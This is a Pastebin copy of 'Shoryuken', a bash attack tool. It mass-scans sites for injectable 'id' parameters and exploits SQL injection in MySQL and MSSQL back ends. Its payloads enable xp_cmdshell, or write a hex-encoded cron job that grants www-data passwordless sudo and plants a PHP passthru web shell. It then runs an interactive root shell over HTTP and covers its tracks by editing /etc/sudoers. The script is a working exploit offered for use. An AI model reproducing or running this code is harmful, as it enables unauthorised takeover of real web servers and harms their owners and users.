Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- ### Shoryuken by Brute Logic ###
- version="1.5"
- agent="Mozilla/4.0"
- timeout=1
- option=$1
- target=$2
- output=$3
- www1="c:\inetpub\wwwroot\\"
- sh1=$(cat /dev/urandom | tr -cd a-z | head -c 6)".txt"
- www2="/var/www/"
- sh2=$(cat /dev/urandom | tr -cd a-z | head -c 6)".php"
- ### Weak Spot ###
- function WEAK_SPOT {
- param=$(echo $target | sed 's/.*?//1' | sed 's/.*&//1')
- tparam=$(echo $param | sed 's/.*=//1' | tr -cd a-z)
- if [ -z $tparam ]
- then
- q="%20"
- else
- q="%27"
- fi
- }
- ### Cleaning ###
- function CLEANING {
- if [ "$ptype" = 'ASP' ]
- then
- curl -A $agent -s "$target+exec+xp_cmdshell+%5Bdel%20$www1$sh1%5D" >/dev/null
- else
- curl -A $agent "$target_root/$sh2?c=n=\$(sudo+cat+/etc/sudoers|wc+-l);sudo+rm+$www2$sh2;sudo+sed+-i+%22\$n+d%22+/etc/sudoers"
- fi
- echo -e "\n[+] Cleaned."
- }
- ### Shell ###
- function SHELL {
- target_root=$(echo $target | sed 's/http:\/\///1' | sed 's/\/.*//1')
- pre="cd%20.%26%26"
- on=0
- t=59
- if [ "$ptype" = 'PHP' ]
- then
- while [ $t -gt 0 ]
- do
- echo -ne "[.] Waiting $((t--)) seconds for shell...\r"
- sleep 1
- done
- echo -e "[+] Read to go. \n"
- fi
- while [ 1 ]
- do
- if [ "$ptype" = 'ASP' ]
- then
- read -p "C:\shoryuken> " cmd arg1 arg2 arg3
- else
- read -p "sho@ryuken:~# " cmd arg1 arg2 arg3
- fi
- arg1=$(echo $arg1 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
- arg2=$(echo $arg2 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
- arg3=$(echo $arg3 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
- case $cmd in
- ?) echo -e "[+] Type on/off to display payload or not (default off).\n[+] Append &&echo after echo commands to write to a file.\n";;
- exit|quit) CLEANING
- break;;
- on) echo -e "[+] Payload display is ON.\n"
- on=1;;
- off) echo -e "[+] Payload display is OFF.\n"
- on=0;;
- *) if [ "$cmd" = 'cd' ]
- then
- pre="$pre$cmd%20$arg1%20$arg2%20$arg3%26%26"
- else
- if [ "$ptype" = 'ASP' ]
- then
- cmd="$pre$cmd%20$arg1%20$arg2%20$arg3"
- payload="+exec+xp_cmdshell+%5B$cmd>$www1$sh1%5D+--sp_password+"
- else
- cmd="$pre%20sudo%20$cmd%20$arg1%20$arg2%20$arg3"
- payload="$cmd"
- fi
- if [ $on = 1 ]
- then
- echo -e "[+] Payload: $payload"
- echo ""
- fi
- if [ "$ptype" = 'ASP' ]
- then
- curl -A $agent -s "$target$payload" >/dev/null
- output=$sh1
- else
- output=$sh2?c=$payload
- fi
- curl -A $agent "$target_root/$output"
- echo ""
- fi
- esac
- done
- }
- ### Punch ###
- function PUNCH {
- WEAK_SPOT
- mssqli=$(echo "$q+exec+sp_configure+%5Bshow%20advanced%20options%5D,1+reconfigure+exec+sp_configure%5Bxp_cmdshell%5D,1+reconfigure+exec+xp_cmdshell+%5Bwhoami>$www1$sh1%5D+--sp_password+" | sed -e "s/+/\/\*\&$param\*\//g")
- hex=$(echo $www2$sh2 | od -A n -t x1 | sed 's/ //g' | tr -d '\n')
- mysqli="$q/*!+into+outfile%22/etc/cron.d/s%22+fields+enclosed+by+0x23+lines+terminated+by+0x0A2A202A202A202A202A20726F6F74202F62696E2F6563686F20277777772D6461746120414C4C3D28414C4C29204E4F5041535357443A20414C4C273E3E2F6574632F7375646F6572732026202F62696E2F726D202F6574632F63726F6E2E642F732026202F62696E2F6563686F20273C3F706870206563686F20706173737468727528245F4745545B635D293B203F3E273E$hex*/#"
- shoryuken=$(curl -A $agent -s -i "$target$mssqli&$param$mysqli")
- status=$(echo -e "$shoryuken" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
- PHP=$(echo -e "$shoryuken" | grep X-Powered-By | grep PHP)
- ASP=$(echo -e "$shoryuken" | grep X-Powered-By | grep ASP)
- if [ -n "$ASP" ]
- then
- ptype="ASP"
- else
- ptype="PHP"
- fi
- case $status in
- 200) echo -e "[!] Punch given (status code 200), enjoy your shell if vulnerable.\n"
- echo -e "[*] Type ? to help.\n"
- SHELL
- break;;
- 301) echo -e "[-] Punch dodged (status code 301), review target.";;
- 302) echo -e "[-] Punch dodged (status code 301), review target.";;
- 404) echo -e "[-] Punch missed (status code 404), review target.";;
- 500) echo -e "[-] Punch failed (status code 500), maybe detected.";;
- 503) echo -e "[-] Server is down (status code 503), try again.";;
- *) echo -e "[-] An error occurred, review your settings.";;
- esac
- }
- ### Test ###
- function TEST {
- WEAK_SPOT
- mssqli=$(echo "$q+and+0<(+select+is_srvrolemember+(convert+(char,0x73797361646D696E)));--sp_password+" | sed -e "s/+/\/\*\&$param\*\//g")
- mysqli="$q/*!+and+0<locate(0x3d726f6f74,replace(load_file(0x2f6574632f6d7973716c2f6d792e636e66),0x20,0x3D))+or+0<locate(0x3d726f6f74,replace(load_file(0x2f6574632f6d792e636e66),0x20,0x3D))*/#"
- req1=$(curl -A $agent --connect-timeout $timeout -s -i "$target" | wc -c)
- req2=$(curl -A $agent --connect-timeout $timeout -s -i "$target$mssqli&$param$mysqli")
- status=$(echo -e "$req2" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
- req2=$(echo -ne "$req2" | wc -c)
- if [ $req1 = 0 -o $req2 = 0 ]
- then
- echo -e "[-] Not vulnerable to shoryuken."
- vuln=0
- else
- if [ $status = 200 ]
- then
- if [ $req1 = $req2 ]
- then
- echo -e "[!] Target may be VULNERABLE to shoryuken."
- vuln=1
- else
- echo -e "[-] Not vulnerable to shoryuken."
- vuln=0
- fi
- else
- echo -e "[-] It was not possible to test the target."
- vuln=0
- fi
- fi
- }
- ### List Mode ###
- function LIST {
- touch ./$output
- for line in $(cat $target)
- do
- target=$line
- TEST
- if [ $vuln = 1 ]
- then
- echo $target >> ./$output
- fi
- done
- echo -e "\n[+] Found "$(cat $output | wc -l)" vulnerable targets."
- }
- ### Scan Mode ###
- function SCAN {
- try[1]="/?id=1"
- try[2]="/index.php?id=1"
- try[3]="/default.asp?id=1"
- try[4]="/default.aspx?id=1"
- try[5]="/article.php?id=1"
- try[6]="/article.asp?id=1"
- touch ./$output
- for line in $(cat $target)
- do
- for n in {1..6}
- do
- scan=$(curl -A $agent --connect-timeout $timeout -s -i "$line/${try[$n]}" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
- if [ -z $scan ]
- then
- break
- fi
- if [ $scan = 200 ]
- then
- echo -e "[!] Found: $line${try[$n]}"
- echo "$line${try[$n]}" >> $output
- fi
- done
- done
- }
- ### Interactive Mode ###
- function INTERACTIVE {
- echo -e "[?] Type target (format: domain/path/page?parameter_to_test=value):"
- read t
- if [ -z $t ]
- then
- echo -e "[-] Target can not be blank, quitting..."
- break
- else
- target=$t
- fi
- echo -e "\n[?] Test if it is vulnerable first?\n[1] Yes\n[2] Skip this step\n"
- read -s -n 1 v
- case $v in
- 1) TEST
- echo -e "\n[?] Continue?\n[1] Yes\n[2] No\n"
- read -s -n 1 v
- case $v in
- 1) echo -e "[+] Preparing rising dragon punch...";;
- 2) echo -e "[-] Quitting..."
- break;;
- *) echo -e "[-] Invalid option, quitting..."
- break;;
- esac;;
- 2) echo -e "[+] Preparing rising dragon punch...";;
- *) echo -e "[-] Invalid option, quitting..."
- break;;
- esac
- PUNCH
- }
- ### Help Menu ###
- function HELP {
- echo -e "Author:\n\tBrute Logic (http://about.me/brutelogic) Twitter @brutelogic\n\nDescription:\n\tShoryuken is a tool designed to get full control of poorly configurated web applications with backend DBMS in the same machine. In its current version, it uses SQL injection techniques to own MYSQL and MSSQL hosts when they run as OS user ROOT with application user having file privileges (Linux MySQL) or as DB sysadmin user with DB running as OS user SYSTEM (Windows MSSQL). It is done using the same unique HTTP request, the shoryuken (that means \"rising dragon punch\" in japanese).\n\tAfter successful exploitation, a custom \"shell\" is provided using only port 80 (it will be always there) without need to download anything or relying on firewall's policy.\n\tShoryuken needs curl installed (Debian-like systems: apt-get install curl).\n\nUsage:\n\t./shoryuken$version [OPTION] {TARGET | INPUT_FILE} {OUTPUT_FILE}\n\t=> Rearrange URL if needed to put vulnerable parameter ALWAYS at the end.\n\nOptions:\n\t-h\thelp\n\t-i\tinteractive mode\n\t-p\tdirect punch\n\t-t\ttest mode\n\t-s\tscan from list\n\t-t\ttest from list\n\nExamples:\n\t./shoryuken$version -i\n\t./shoryuken$version -p \"192.168.0.2/test.asp?id=1\"\n\t./shoryuken$version -p \"vuln-site.net/home/news.php?info=text&vuln_param=11230\"\n\t./shoryuken$version -t \"www.example.com/page.php?name=john\"\n\t./shoryuken$version -s hosts.txt mytargets.txt\n\t./shoryuken$version -l mytargets.txt vulnerables.txt"
- break
- }
- ### BEGIN ###
- echo -e "[+] Shoryuken $version started.\n"
- for i in 1
- do
- case $option in
- -i) INTERACTIVE;;
- -h) HELP;;
- -l) LIST;;
- -p) PUNCH;;
- -s) SCAN;;
- -t) TEST;;
- *) echo -e "[-] Invalid option, quitting..."
- break;;
- esac
- done
- echo -e "\n[+] Done."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement